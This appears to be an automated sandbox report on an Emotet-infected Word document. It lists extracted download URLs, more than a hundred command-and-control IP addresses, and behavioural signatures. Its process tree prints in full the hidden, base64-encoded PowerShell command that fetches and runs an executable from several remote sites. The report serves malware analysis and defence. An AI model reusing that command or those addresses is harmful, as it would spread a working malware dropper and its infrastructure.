Analysis
-
max time kernel
27s -
resource
win10v191014 -
submitted
25-12-2019 01:02
General
Malware Config
Extracted
http://diwafashions.com/wp-admin/mqau6/
http://designers.hotcom-web.com/ubkskw29clek/qnpm1p/
http://dixartcontractors.com/cgi-bin/nnuv/
http://diaspotv.info/wordpress/G/
http://easyvisaoverseas.com/cgi-bin/v/
Extracted
emotet
24.181.125.62:80
98.156.206.153:80
173.21.26.90:80
108.61.99.179:8080
165.227.156.155:443
159.69.89.130:8080
167.99.105.223:7080
5.196.74.210:8080
200.7.243.108:443
183.102.238.69:465
64.147.15.138:80
85.152.174.56:80
59.148.227.190:80
62.75.187.192:8080
174.77.190.137:8080
87.106.139.101:8080
173.247.19.238:80
2.38.99.79:80
178.210.51.222:8080
209.141.54.221:8080
91.242.138.5:443
190.147.215.53:22
186.67.208.78:8080
107.170.24.125:8080
81.0.63.86:8080
100.14.117.137:80
190.220.19.82:443
76.164.99.46:80
190.189.224.117:443
110.143.57.109:80
47.156.70.145:80
206.189.112.148:8080
217.160.182.191:8080
47.149.28.234:80
2.237.76.249:80
45.51.40.140:80
128.65.154.183:443
138.59.177.106:443
78.24.219.147:8080
87.230.19.21:8080
200.114.167.85:80
149.202.153.252:8080
82.27.181.93:80
173.91.11.142:80
66.25.34.20:80
190.162.159.212:80
176.106.183.253:8080
139.130.241.252:443
46.105.131.87:80
73.11.153.178:8080
210.6.85.121:80
178.237.139.83:8080
184.167.148.162:80
120.150.246.241:80
108.20.69.44:80
201.184.105.242:443
138.122.5.214:8080
182.176.132.213:8090
85.72.180.68:80
219.78.255.48:80
176.31.200.130:8080
45.33.49.124:443
174.81.132.128:80
201.251.133.92:443
104.131.11.150:8080
12.176.19.218:80
82.155.161.203:80
62.138.26.28:8080
169.239.182.217:8080
167.71.10.37:8080
47.6.15.79:443
85.67.10.190:80
192.241.255.77:8080
5.88.182.250:80
61.197.110.214:80
95.128.43.213:8080
31.172.240.91:8080
66.209.97.122:8080
188.152.7.140:80
159.65.25.128:8080
59.103.164.174:80
24.94.237.248:80
190.12.119.180:443
101.187.247.29:80
104.236.246.93:8080
5.154.58.24:80
93.147.141.5:80
31.31.77.83:443
31.177.54.196:443
75.80.148.244:80
116.48.142.21:443
186.75.241.230:80
86.98.156.239:443
120.151.135.224:80
165.228.24.197:80
206.81.10.215:8080
73.214.99.25:80
212.129.24.79:8080
104.131.44.150:8080
144.139.247.220:80
24.93.212.32:80
91.205.215.66:443
47.6.15.79:80
68.118.26.116:80
24.105.202.216:443
108.179.206.219:8080
37.59.24.177:8080
209.97.168.52:8080
91.73.197.90:80
92.222.216.44:8080
50.116.86.205:8080
218.44.21.114:80
103.86.49.11:8080
110.142.38.16:80
104.137.176.186:80
179.13.185.19:80
195.244.215.206:80
67.225.179.64:8080
178.209.71.63:8080
37.157.194.134:443
73.176.241.255:80
80.21.182.46:80
201.173.217.124:443
211.63.71.72:8080
46.216.60.138:80
1.33.230.137:80
87.106.136.232:8080
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
882.exe882.exepid Process 3848 882.exe 4368 882.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
882.exepid Process 4368 882.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid Process 4968 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid Process 4968 WINWORD.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
Powershell.exe882.exedescription pid Process procid_target PID 3344 wrote to memory of 3848 3344 Powershell.exe 80 PID 3848 wrote to memory of 4368 3848 882.exe 81 -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid Process 3344 Powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
882.exedescription ioc Process File renamed C:\Users\Admin\882.exe => C:\Windows\SysWOW64\memoraw.exe 882.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE882.exe882.exepid Process 4968 WINWORD.EXE 3848 882.exe 4368 882.exe -
Process spawned unexpected child process 1 IoCs
Processes:
Powershell.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3344 2088 Powershell.exe 74 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid Process Token: SeDebugPrivilege 3344 Powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\25eace8fcf797762361e56a88c938c30f99acb13c928b8f618f0d0a6f33fd60b.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4968
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABWAGgAZAByAGkAZwBwAHQAeQA9ACcARwByAG4AcgBsAHYAagBnAHEAdwBpAGUAbAAnADsAJABRAGgAeQBtAGQAZAB0AHAAdQAgAD0AIAAnADgAOAAyACcAOwAkAFEAeQBmAHIAZgBhAHgAcABzAHAAeQA9ACcAQgBuAGIAbwByAGEAZwB6AGwAcgAnADsAJABLAGEAdABxAGgAcwByAGcAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFEAaAB5AG0AZABkAHQAcAB1ACsAJwAuAGUAeABlACcAOwAkAE8AYQBqAG4AZAByAHUAbAByAD0AJwBTAHoAdABnAHUAeAB6AHcAdwBrAHUAbwAnADsAJABGAHUAegBqAGQAcwBnAHYAZQA9ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAFQALgBXAGUAYgBDAGwAaQBFAE4AVAA7ACQAVgB4AHkAegB5AHYAeQBzAGYAbQA9ACcAaAB0AHQAcAA6AC8ALwBkAGkAdwBhAGYAYQBzAGgAaQBvAG4AcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbQBxAGEAdQA2AC8AKgBoAHQAdABwADoALwAvAGQAZQBzAGkAZwBuAGUAcgBzAC4AaABvAHQAYwBvAG0ALQB3AGUAYgAuAGMAbwBtAC8AdQBiAGsAcwBrAHcAMgA5AGMAbABlAGsALwBxAG4AcABtADEAcAAvACoAaAB0AHQAcAA6AC8ALwBkAGkAeABhAHIAdABjAG8AbgB0AHIAYQBjAHQAbwByAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBuAG4AdQB2AC8AKgBoAHQAdABwADoALwAvAGQAaQBhAHMAcABvAHQAdgAuAGkAbgBmAG8ALwB3AG8AcgBkAHAAcgBlAHMAcwAvAEcALwAqAGgAdAB0AHAAOgAvAC8AZQBhAHMAeQB2AGkAcwBhAG8AdgBlAHIAcwBlAGEAcwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHYALwAnAC4AIgBzAFAAbABgAEkAVAAiACgAJwAqACcAKQA7ACQAUAB1AHcAcQBvAGYAZwBoAGwAPQAnAE4AYgBwAHgAZABuAHUAZAAnADsAZgBvAHIAZQBhAGMAaAAoACQASABkAGkAawBjAGUAdgBiAHUAYwB6AGgAYQAgAGkAbgAgACQAVgB4AHkAegB5AHYAeQBzAGYAbQApAHsAdAByAHkAewAkAEYAdQB6AGoAZABzAGcAdgBlAC4AIgBkAG8AdwBOAEwAbwBhAGQAYABGAGAASQBsAGUAIgAoACQASABkAGkAawBjAGUAdgBiAHUAYwB6AGgAYQAsACAAJABLAGEAdABxAGgAcwByAGcAKQA7ACQAUAB5AHUAbQBiAG0AdgBiAHYAdAA9ACcASABuAHgAeQB2AGMAcwBuACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQASwBhAHQAcQBoAHMAcgBnACkALgAiAGwAZQBuAGAAZwBUAGgAIgAgAC0AZwBlACAAMgA4ADQAMQAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABhAGAAUgBUACIAKAAkAEsAYQB0AHEAaABzAHIAZwApADsAJABHAGcAdwBqAHkAcwB4AHoAPQAnAFgAYQB2AGMAZABtAHMAbABnAHAAeAAnADsAYgByAGUAYQBrADsAJABVAGIAYQBmAHIAcwBrAGYAeQBiAD0AJwBHAGYAYwB4AGkAeQB1AGEAbQBqAG4AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBwAGEAYwBlAHgAZQByAHUAYgBpAHgAbgA9ACcAQQBrAHoAeQB5AG8AeABoAHAAJwA=1⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:3344 -
C:\Users\Admin\882.exe"C:\Users\Admin\882.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:3848 -
C:\Users\Admin\882.exe--2f98b903⤵
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4368
-
-